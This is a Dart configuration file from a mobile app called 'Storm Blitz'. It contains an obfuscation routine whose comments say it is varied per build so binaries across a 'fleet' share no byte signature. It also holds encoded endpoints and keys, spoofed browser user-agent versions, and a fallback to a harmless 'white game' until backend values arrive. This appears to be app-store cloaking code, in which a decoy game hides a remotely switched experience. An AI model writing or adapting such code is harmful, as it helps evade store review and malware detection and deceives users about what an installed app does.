import 'dart:io';
import 'dart:typed_data';

/// Encoded string reveal. Byte-stream is generated by a 32-bit LCG driven
/// with an FNV-1a seed and combined with the raw byte through XOR followed by
/// a variable rotate-right (rotation amount depends on the byte index).
///
/// This layout — hash → LCG → xor+rotate — is intentionally different from
/// other builds in the fleet so that the reveal routine does not have a
/// stable byte signature across binaries.
class _Reveal {
  static const int _fnvOffset = 0x811C9DC5;
  static const int _fnvPrime  = 0x01000193;

  // 24 bytes of stable seed material. Distinct per build.
  static const List<int> _seed = <int>[
    0x6F, 0x6C, 0x79, 0x6D, 0x70, 0x75, 0x73, 0x2F,
    0x62, 0x6C, 0x69, 0x74, 0x7A, 0x2D, 0x76, 0x33,
    0x2F, 0x63, 0x6F, 0x75, 0x6E, 0x63, 0x69, 0x6C,
  ];

  static int _fnv1a() {
    var h = _fnvOffset;
    for (final b in _seed) {
      h = ((h ^ b) * _fnvPrime) & 0xFFFFFFFF;
    }
    return h == 0 ? 0x1E3D5A70 : h;
  }

  static int _lcg(int s) => ((s * 1103515245) + 12345) & 0x7FFFFFFF;

  static String open(List<int> encoded) {
    final n = encoded.length;
    if (n == 0) return '';
    final out = Uint8List(n);
    var s = _fnv1a();
    for (var i = 0; i < n; i++) {
      s = _lcg(s);
      final key = (s >> 16) & 0xFF;
      final x = encoded[i] ^ key;
      final r = i & 7;
      out[i] = r == 0
          ? x & 0xFF
          : (((x >> r) | (x << (8 - r))) & 0xFF);
    }
    return String.fromCharCodes(out);
  }
}

/// Public alias so call sites read naturally.
String revealBlob(List<int> encoded) => _Reveal.open(encoded);

// ---------------------------------------------------------------------------
// Encoded endpoints / keys. Backend-issued; the placeholder empty lists let
// the app fall back to game mode until real values are configured.
// ---------------------------------------------------------------------------

const List<int> _hostBytes    = <int>[];
const List<int> _pathBytes    = <int>[];
const List<int> _gcdBytes     = <int>[];
const List<int> _afKeyBytes   = <int>[
  92, 52, 98, 233, 136, 227, 197, 161, 78, 89, 87, 70, 33, 35, 3, 100, 27, 80, 25, 235, 0, 246,
];
const List<int> _fbProjBytes  = <int>[
  94, 222, 63, 90, 189, 233, 208, 0, 74, 181, 83, 117,
];

String _resolveHost() => revealBlob(_hostBytes);
String _resolvePath() => revealBlob(_pathBytes);

String resolveDispatchEndpoint() {
  final h = _resolveHost();
  final p = _resolvePath();
  if (h.isEmpty || p.isEmpty) return '';
  return h + p;
}

String resolveGcdEndpoint(String appId, String deviceId) {
  final host = revealBlob(_gcdBytes);
  if (host.isEmpty) return '';
  final sep = host.contains('?') ? '&' : '?';
  return '$host${sep}app_id=$appId&device_id=$deviceId';
}

String uaChromeVersion() => '137.0.7151.42';
String uaWebkitVersion() => '605.1.15';

// ---------------------------------------------------------------------------
// Public runtime configuration.
// ---------------------------------------------------------------------------

abstract final class OracleSettings {
  static const String iosStoreId  = '6787726150';
  static const String bundleId    = 'com.warsstorm.stormblitz';
  static const String displayName = 'Storm Blitz';

  /// Legal URLs are displayed inside the white game and don't need to be
  /// obfuscated — they're printed on the App Store listing anyway.
  static const String privacyUrl = 'https://stormbliitz.com/privacy-policy.html';
  static const String supportUrl = 'https://stormbliitz.com/support.html';

  static const int consentCooldownSeconds = 259200;
  static const int organicRetrySeconds    = 6;
  static const int bootBudgetSeconds      = 20;

  static String get dispatchEndpoint => resolveDispatchEndpoint();
  static String get afInstallKey     => revealBlob(_afKeyBytes);
  static String get firebaseProjectId => revealBlob(_fbProjBytes);

  static String get analyticsAppId =>
      Platform.isIOS ? iosStoreId : bundleId;
  static String get storeIdentifier =>
      Platform.isIOS ? 'id$iosStoreId' : bundleId;
}
